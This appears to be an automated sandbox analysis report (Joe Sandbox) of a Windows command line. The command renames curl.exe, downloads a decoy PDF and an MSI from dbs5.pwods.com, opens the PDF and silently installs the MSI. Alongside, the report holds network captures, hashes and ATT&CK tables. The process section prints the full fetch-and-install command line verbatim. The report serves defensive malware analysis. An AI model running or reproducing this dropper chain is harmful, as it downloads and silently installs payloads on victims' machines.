Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_000FA8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free,3_2_000FA8D8
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_000F8490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError,3_2_000F8490
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_000DDEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,3_2_000DDEDF
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
Command and Scripting Interpreter
1
DLL Side-Loading
11
Process Injection
1
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services11
Archive Collected Data
21
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API
Boot or Logon Initialization Scripts1
DLL Side-Loading
11
Process Injection
LSASS Memory11
Security Software Discovery
Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information
NTDS22
System Information Discovery
Distributed Component Object ModelInput Capture4
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528038 Cookbook: defaultwindowscmdlinecookbook.jbs Startdate: 07/10/2024 Architecture: WINDOWS Score: 8 22 dbs5.pwods.com 2->22 6 cmd.exe 2 2->6         started        9 msiexec.exe 2->9         started        process3 file4 20 C:\Program Files (x86)\...\TNheBOJElq.exe, PE32 6->20 dropped 11 TNheBOJElq.exe 1 6->11         started        14 TNheBOJElq.exe 2 6->14         started        16 conhost.exe 6->16         started        18 2 other processes 6->18 process5 dnsIp6 24 dbs5.pwods.com 8.209.119.17, 443, 49706, 49709 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 11->24 26 127.0.0.1 unknown unknown 11->26

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
SourceDetectionScannerLabelLink
C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
dbs5.pwods.com
8.209.119.17
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://dbs5.pwods.com/download/pdffalse
      unknown
      https://dbs5.pwods.com/download/agentfalse
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://curl.se/docs/hsts.htmlTNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drfalse
          unknown
          https://curl.se/docs/copyright.htmlDTNheBOJElq.exe, 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071765607.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drfalse
            unknown
            https://curl.se/libcurl/c/curl_easy_setopt.htmlTNheBOJElq.exe.0.drfalse
              unknown
              https://curl.se/PTNheBOJElq.exe, 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071765607.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drfalse
                unknown
                https://curl.se/docs/http-cookies.html#TNheBOJElq.exefalse
                  unknown
                  https://curl.se/docs/http-cookies.htmlTNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drfalse
                    unknown
                    https://curl.se/docs/hsts.html#TNheBOJElq.exefalse
                      unknown
                      https://curl.se/docs/sslcerts.htmlTNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drfalse
                        unknown
                        https://curl.se/docs/sslcerts.htmlcurlTNheBOJElq.exefalse
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          8.209.119.17
                          dbs5.pwods.comSingapore
                          45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                          IP
                          127.0.0.1
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1528038
                          Start date and time:2024-10-07 14:31:43 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 40s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowscmdlinecookbook.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:9
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:CLEAN
                          Classification:clean8.win@11/3@1/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 65
                          • Number of non-executed functions: 239
                          • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          No simulations
                          No context
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCxd.arm7.elfGet hashmaliciousMiraiBrowse
                          • 47.253.41.41
                          z1SupplyInvoiceCM60916_Doc.exeGet hashmaliciousFormBookBrowse
                          • 8.217.17.192
                          https://gtm.you1.cn/app/381210Get hashmaliciousUnknownBrowse
                          • 47.57.186.72
                          na.elfGet hashmaliciousMirai, OkiruBrowse
                          • 47.255.177.103
                          na.elfGet hashmaliciousMiraiBrowse
                          • 8.221.121.89
                          http://ipfs.io/ipfs/bafybeidgkzr2gy7npe4yonk6p7s4chmwvgd2cp7bk7u6llfwiutgvt77tqGet hashmaliciousHTMLPhisherBrowse
                          • 47.246.131.28
                          na.elfGet hashmaliciousMiraiBrowse
                          • 47.91.26.168
                          https://us-usps-vpoktn.xyz/update/Get hashmaliciousUnknownBrowse
                          • 47.252.21.175
                          https://us-usps-zguvhm.xyz/update/Get hashmaliciousUnknownBrowse
                          • 47.252.21.175
                          https://swiftclaimairdropmeta.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                          • 47.253.61.56
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          74954a0c86284d0d6e1c4efefe92b521main.bat.bin.batGet hashmaliciousDiscord RatBrowse
                          • 8.209.119.17
                          S4dd5N5VuJ.lnkGet hashmaliciousUnknownBrowse
                          • 8.209.119.17
                          404.exeGet hashmaliciousUnknownBrowse
                          • 8.209.119.17
                          D0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                          • 8.209.119.17
                          c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                          • 8.209.119.17
                          404.exeGet hashmaliciousUnknownBrowse
                          • 8.209.119.17
                          s14.batGet hashmaliciousUnknownBrowse
                          • 8.209.119.17
                          s200.batGet hashmaliciousUnknownBrowse
                          • 8.209.119.17
                          KYwOaWhyl6.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                          • 8.209.119.17
                          HdXeCzyZD9.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                          • 8.209.119.17
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe8SdvyePo6j.docmGet hashmaliciousUnknownBrowse
                            New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmGet hashmaliciousUnknownBrowse
                              https://rocksecuritymw.com/mus/?81367511Get hashmaliciousDarkGateBrowse
                                https://taskbes.com/ttse/?75486511Get hashmaliciousDarkGateBrowse
                                  https://ledscreen.africa/dcil/?77391211Get hashmaliciousDarkGateBrowse
                                    m7q7gcniEz.exeGet hashmaliciousUnknownBrowse
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):470528
                                      Entropy (8bit):6.743680599799538
                                      Encrypted:false
                                      SSDEEP:12288:sUE03qxFqJC1cwgysc/2gIsJFBhlyAjoSYgq:sUE06qCSwgbW2gpD3sAkSYgq
                                      MD5:44E5BAEEE864F1E9EDBE3986246AB37A
                                      SHA1:6EDAE73E36B61B261369717EA3657A6783EBA872
                                      SHA-256:4BCA545DD0DEAC696838C6338BA66A934426A34CE43D136D2750436F31E6BAFB
                                      SHA-512:DC39C1E4F59FCAC4A0A6D6B0AD890F351B5D6655B3173950B8EB4A03419311D0020D86F4868A001DF5CE270DE570B86C4F8AB86473F65E678C5A3493949305EA
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Joe Sandbox View:
                                      • Filename: 8SdvyePo6j.docm, Detection: malicious, Browse
                                      • Filename: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm, Detection: malicious, Browse
                                      • Filename: , Detection: malicious, Browse
                                      • Filename: , Detection: malicious, Browse
                                      • Filename: , Detection: malicious, Browse
                                      • Filename: m7q7gcniEz.exe, Detection: malicious, Browse
                                      Reputation:low
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m.z...)...)...).cP)...).y.(...).y.(...).y.(...).t>)...).n.(...)...)=..).y.(I..).yR)...).y.(...)Rich...)........................PE..L.....~b.................4..........p........P....@..........................p............@.................................\...4.......@.......................@Q..X...T...............................@............P...............................text...i3.......4.................. ..`.rdata..J....P.......8..............@..@.data...............................@....rsrc...@...........................@..@.reloc..@Q.......R..................@..B........................................................................................................................................................................................................................................................................................................
                                      Process:C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
                                      File Type:ASCII text, with CR, LF line terminators
                                      Category:dropped
                                      Size (bytes):399
                                      Entropy (8bit):2.8468200845103793
                                      Encrypted:false
                                      SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgcdSgOgcdivIdYn:Vz6ykymUexb1U9cL9cddYn
                                      MD5:468B8E2CE4B78F70D493C5E93268316B
                                      SHA1:C10BFB528603E153E49F323E0A7688639D84F717
                                      SHA-256:49AEA951831CC33FCD97502466B169294C78B8E327E418314523FDC574F06196
                                      SHA-512:83B6B721E7E1321F70C6778529CD6B6E41E7EF497D2EB7CE76AF7A7A7B60FA9C613BDFB6B55F67EE2D6683AB13DC4AD5CF6C3D1DBACB9B0ACEC0408D14A7EC3F
                                      Malicious:false
                                      Reputation:low
                                      Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0..
                                      No static file info
                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 7, 2024 14:32:35.191113949 CEST49706443192.168.2.58.209.119.17
                                      Oct 7, 2024 14:32:35.191170931 CEST443497068.209.119.17192.168.2.5
                                      Oct 7, 2024 14:32:35.191277981 CEST49706443192.168.2.58.209.119.17
                                      Oct 7, 2024 14:32:35.222100019 CEST49706443192.168.2.58.209.119.17
                                      Oct 7, 2024 14:32:35.222145081 CEST443497068.209.119.17192.168.2.5
                                      Oct 7, 2024 14:32:35.831423044 CEST443497068.209.119.17192.168.2.5
                                      Oct 7, 2024 14:32:35.831743956 CEST49706443192.168.2.58.209.119.17
                                      Oct 7, 2024 14:32:35.835268021 CEST49706443192.168.2.58.209.119.17
                                      Oct 7, 2024 14:32:35.835299969 CEST443497068.209.119.17192.168.2.5
                                      Oct 7, 2024 14:32:35.835683107 CEST443497068.209.119.17192.168.2.5
                                      Oct 7, 2024 14:32:35.838810921 CEST49706443192.168.2.58.209.119.17
                                      Oct 7, 2024 14:32:35.879446030 CEST443497068.209.119.17192.168.2.5
                                      Oct 7, 2024 14:32:36.123728037 CEST443497068.209.119.17192.168.2.5
                                      Oct 7, 2024 14:32:36.123780966 CEST443497068.209.119.17192.168.2.5
                                      Oct 7, 2024 14:32:36.123842955 CEST443497068.209.119.17192.168.2.5
                                      Oct 7, 2024 14:32:36.123876095 CEST49706443192.168.2.58.209.119.17
                                      Oct 7, 2024 14:32:36.123910904 CEST443497068.209.119.17192.168.2.5
                                      Oct 7, 2024 14:32:36.123931885 CEST49706443192.168.2.58.209.119.17
                                      Oct 7, 2024 14:32:36.153832912 CEST49706443192.168.2.58.209.119.17
                                      Oct 7, 2024 14:32:36.153876066 CEST443497068.209.119.17192.168.2.5
                                      Oct 7, 2024 14:32:36.154272079 CEST443497068.209.119.17192.168.2.5
                                      Oct 7, 2024 14:32:36.154318094 CEST443497068.209.119.17192.168.2.5
                                      Oct 7, 2024 14:32:36.154376984 CEST49706443192.168.2.58.209.119.17
                                      Oct 7, 2024 14:32:36.165652990 CEST49706443192.168.2.58.209.119.17
                                      Oct 7, 2024 14:32:36.582453012 CEST49709443192.168.2.58.209.119.17
                                      Oct 7, 2024 14:32:36.582566977 CEST443497098.209.119.17192.168.2.5
                                      Oct 7, 2024 14:32:36.582679033 CEST49709443192.168.2.58.209.119.17
                                      Oct 7, 2024 14:32:36.703068018 CEST49709443192.168.2.58.209.119.17
                                      Oct 7, 2024 14:32:36.703147888 CEST443497098.209.119.17192.168.2.5
                                      Oct 7, 2024 14:32:37.300194979 CEST443497098.209.119.17192.168.2.5
                                      Oct 7, 2024 14:32:37.300327063 CEST49709443192.168.2.58.209.119.17
                                      Oct 7, 2024 14:32:37.342885017 CEST49709443192.168.2.58.209.119.17
                                      Oct 7, 2024 14:32:37.342972040 CEST443497098.209.119.17192.168.2.5
                                      Oct 7, 2024 14:32:37.343893051 CEST443497098.209.119.17192.168.2.5
                                      Oct 7, 2024 14:32:37.356769085 CEST49709443192.168.2.58.209.119.17
                                      Oct 7, 2024 14:32:37.399447918 CEST443497098.209.119.17192.168.2.5
                                      Oct 7, 2024 14:32:37.955348969 CEST443497098.209.119.17192.168.2.5
                                      Oct 7, 2024 14:32:37.955429077 CEST443497098.209.119.17192.168.2.5
                                      Oct 7, 2024 14:32:37.955518007 CEST49709443192.168.2.58.209.119.17
                                      Oct 7, 2024 14:32:37.976001978 CEST49709443192.168.2.58.209.119.17
                                      Oct 7, 2024 14:32:37.976046085 CEST443497098.209.119.17192.168.2.5
                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 7, 2024 14:32:35.008541107 CEST6195953192.168.2.51.1.1.1
                                      Oct 7, 2024 14:32:35.174392939 CEST53619591.1.1.1192.168.2.5
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Oct 7, 2024 14:32:35.008541107 CEST192.168.2.51.1.1.10xa507Standard query (0)dbs5.pwods.comA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Oct 7, 2024 14:32:35.174392939 CEST1.1.1.1192.168.2.50xa507No error (0)dbs5.pwods.com8.209.119.17A (IP address)IN (0x0001)false
                                      • dbs5.pwods.com
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.5497068.209.119.174431532C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-07 12:32:35 UTC90OUTGET /download/pdf HTTP/1.1
                                      Host: dbs5.pwods.com
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      2024-10-07 12:32:36 UTC296INHTTP/1.1 200 OK
                                      Content-Disposition: attachment; filename=govdoccc.pdf
                                      Content-Type: application/octet-stream
                                      Vary: Origin
                                      X-Ratelimit-Limit: 100
                                      X-Ratelimit-Remaining: 100
                                      X-Ratelimit-Reset: 1728304380
                                      Date: Mon, 07 Oct 2024 12:32:36 GMT
                                      Connection: close
                                      Transfer-Encoding: chunked
                                      2024-10-07 12:32:36 UTC890INData Raw: 33 30 35 66 64 0d 0a 25 50 44 46 2d 32 2e 30 0a 25 e2 e3 cf d3 0a 39 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 0a 2f 4c 65 6e 67 74 68 20 34 31 39 36 31 0a 2f 4c 65 6e 67 74 68 31 20 37 36 33 35 30 0a 3e 3e 0a 73 74 72 65 61 6d 0a 48 89 84 96 0b 78 4c d7 16 c7 ff 6b ce 9c 35 31 11 22 22 08 33 e7 cc 24 67 8a aa aa d7 25 37 d5 78 5e b7 97 4a 2f bd a8 5b 44 24 88 44 82 78 d6 bb a8 46 a4 f1 0a 82 48 3c e3 fd 16 82 a0 e2 15 af 78 b6 cc 98 c4 2b d4 28 ea fa f4 ea 44 a6 7b f0 b9 bd f7 7e fd 9c ef 5b 6b ef b5 ce 5a 7b 7f fb 77 f6 da fb 80 00 f8 61 32 24 44 76 ed f6 7e 93 ea 9f f5 8c 11 1e 87 90 7e d1 09 51 49 ce b9 eb a6 02 14 0e 54 2b 88 1e 95 ac 56 34 76 3e 06 02 7e 05 0c d7 62 93 06 26 1c 59 63 12 23 04 5f 02 f8
                                      Data Ascii: 305fd%PDF-2.0%9 0 obj<</Filter /FlateDecode/Length 41961/Length1 76350>>streamHxLk51""3$g%7x^J/[D$DxFH<x+(D{~[kZ{wa2$Dv~~QIT+V4v>~b&Yc#_
                                      2024-10-07 12:32:36 UTC2372INData Raw: 5b 15 6b 7d eb bb d6 4e d6 28 6b 4c 88 2e c4 3f c4 a2 41 d3 69 95 35 7f 2d 50 ab a5 d5 d5 42 b5 86 5a 33 2d 5c 8b d7 26 6b d3 b4 99 5a aa 36 4f cb d1 36 6a db b5 7c 6d bf 56 a8 9d d6 ce 69 57 b5 32 5b b8 2d c2 d6 d6 d6 cf 16 6d 8b b5 0d b1 25 36 4c 68 38 ba 51 cd b5 96 b5 a9 6e 9d bb 85 3b dc dd da dd c6 dd de bd cd 7d d7 ed 29 ef ff e2 a3 17 4f 5e 94 57 84 54 94 7b ca bd bb 4d ec b3 6c 1d 74 16 dd e7 ba cd 52 a8 14 29 25 4b e3 a4 69 82 5d 9a b4 52 2a 96 7e d1 57 d1 47 ca c1 f2 1c b9 58 7e cc 60 5f c1 ce cc 16 8e e0 7e 86 48 13 04 bb 78 53 a1 a9 c2 0c f3 64 c1 2e db fc 44 81 52 4b 51 95 4e 4a e4 6b 76 7d 95 c9 ca 6e e5 98 72 45 b9 ae 3c 51 9e a9 50 03 04 bb 06 6a 13 b5 d5 1b 76 71 82 5d ba 9a ad ee 51 f7 ff 0f bb 2e 96 6e 96 de 82 5d fa 1b 76 d5 04 bb da
                                      Data Ascii: [k}N(kL.?Ai5-PBZ3-\&kZ6O6j|mViW2[-m%6Lh8Qn;})O^WT{MltR)%Ki]R*~WGX~`_~HxSd.DRKQNJkv}nrE<QPjvq]Q.n]v
                                      2024-10-07 12:32:36 UTC538INData Raw: 2c c4 8e 78 3b de 89 77 45 b7 3b 63 17 ec 8a dd b1 27 f6 c5 12 1c 80 43 74 3a de 8f 0f e2 23 f8 38 3e 89 4f e1 b3 3a 17 c7 e0 0b f8 22 8e c3 09 91 25 bd 82 af e1 eb 38 19 a7 62 05 ce c0 59 91 31 cd c3 05 ba 00 17 e1 1b f8 26 2e c5 15 f8 1e 7e 88 1f e1 27 f8 29 7e 81 5f 47 cd b3 11 b7 e2 76 5d 84 3b 70 37 ee c7 4a 3c a6 5b e3 49 3c 85 67 f1 22 56 61 0d d6 45 45 64 23 af 8f 33 f1 26 c1 24 eb 53 26 c5 a4 46 7d 94 11 59 7e 96 69 66 72 4c 9e c9 37 85 a6 85 69 a5 db 9b 36 a6 9d b9 25 6a a7 3b a3 02 e8 6c ba 68 32 f7 9a ae a6 9b e9 6e 7a 98 9e a6 97 e9 6d fa 98 be a6 9f e9 6f 8a 4d 89 29 35 65 a6 dc 0c 30 03 cd 20 33 d8 0c 89 4e 86 ca 6a f9 e0 ff ef a3 43 2d da fd f6 3e 66 98 19 61 1e 32 8f 99 51 f2 2f a7 1c 3a 76 de c5 bb 24 97 e2 52 5d a6 cb 76 b9 ae b9 2b 70
                                      Data Ascii: ,x;wE;c'Ct:#8>O:"%8bY1&.~')~_Gv];p7J<[I<g"VaEEd#3&$S&F}Y~ifrL7i6%j;lh2nzmoM)5e0 3NjC->fa2Q/:v$R]v+p
                                      2024-10-07 12:32:36 UTC4744INData Raw: 17 f9 16 be a5 6f e5 fb fb 62 5f e2 4b 7d 99 6f ed db f8 72 df db f7 f1 7d 7d 3f 33 da 3c 63 9e 83 75 f2 b1 7c 22 9f ca 67 f2 b9 fc 47 be 90 2f e5 2b 58 0f df c2 06 f8 0e 36 c2 26 d8 0c 5b 60 2b 6c 83 ed f0 3d ec 80 43 50 09 87 e1 08 1c 85 63 70 1c 4e c0 8f 70 32 a2 fd 8e 88 ee 52 2c c3 72 9d ae 33 74 a6 ce 8a 18 1f 89 0f e1 c3 11 f7 fd b0 3f 16 47 d4 0f c7 11 f8 40 34 09 bd b0 37 f6 89 d8 fd 06 d7 e2 ba 88 df 4d b8 19 b7 44 b3 f0 34 8e c6 67 fe c7 75 b5 40 45 71 5e e1 7b ff 7f 66 57 f1 85 cf 45 b0 30 30 bc 84 45 1e a2 22 a2 a0 bb 8b 28 be 40 51 d6 9a b8 20 2a a0 89 98 a4 36 1a 53 6d 8d 42 17 1b a3 c7 f8 38 c7 f8 a8 c7 62 cb 69 3a 98 6a d5 d8 86 78 62 5a 63 8c 31 3e a2 69 ea a3 d1 f8 48 b4 d6 a0 c7 1e 75 ff 7e bb a6 46 bb f7 cc 9e 3b 33 ff cc 7f ff 3b f7
                                      Data Ascii: ob_K}or}}?3<cu|"gG/+X6&[`+l=CPcpNp2R,r3t?G@47MD4gu@Eq^{fWE00E"(@Q *6SmB8bi:jxbZc1>iHu~F;3;


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.5497098.209.119.174436484C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-07 12:32:37 UTC92OUTGET /download/agent HTTP/1.1
                                      Host: dbs5.pwods.com
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      2024-10-07 12:32:37 UTC190INHTTP/1.1 200 OK
                                      Vary: Origin
                                      X-Ratelimit-Limit: 100
                                      X-Ratelimit-Remaining: 99
                                      X-Ratelimit-Reset: 1728304380
                                      Date: Mon, 07 Oct 2024 12:32:37 GMT
                                      Content-Length: 0
                                      Connection: close


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:08:32:33
                                      Start date:07/10/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf & "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:1
                                      Start time:08:32:33
                                      Start date:07/10/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:08:32:33
                                      Start date:07/10/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:08:32:33
                                      Start date:07/10/2024
                                      Path:C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
                                      Wow64 process (32bit):true
                                      Commandline:TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf
                                      Imagebase:0xc0000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:4
                                      Start time:08:32:35
                                      Start date:07/10/2024
                                      Path:C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
                                      Wow64 process (32bit):true
                                      Commandline:TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent
                                      Imagebase:0xc0000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:5
                                      Start time:08:32:37
                                      Start date:07/10/2024
                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn
                                      Imagebase:0x7a0000
                                      File size:59'904 bytes
                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:08:32:37
                                      Start date:07/10/2024
                                      Path:C:\Windows\System32\msiexec.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                      Imagebase:0x7ff7f43f0000
                                      File size:69'632 bytes
                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
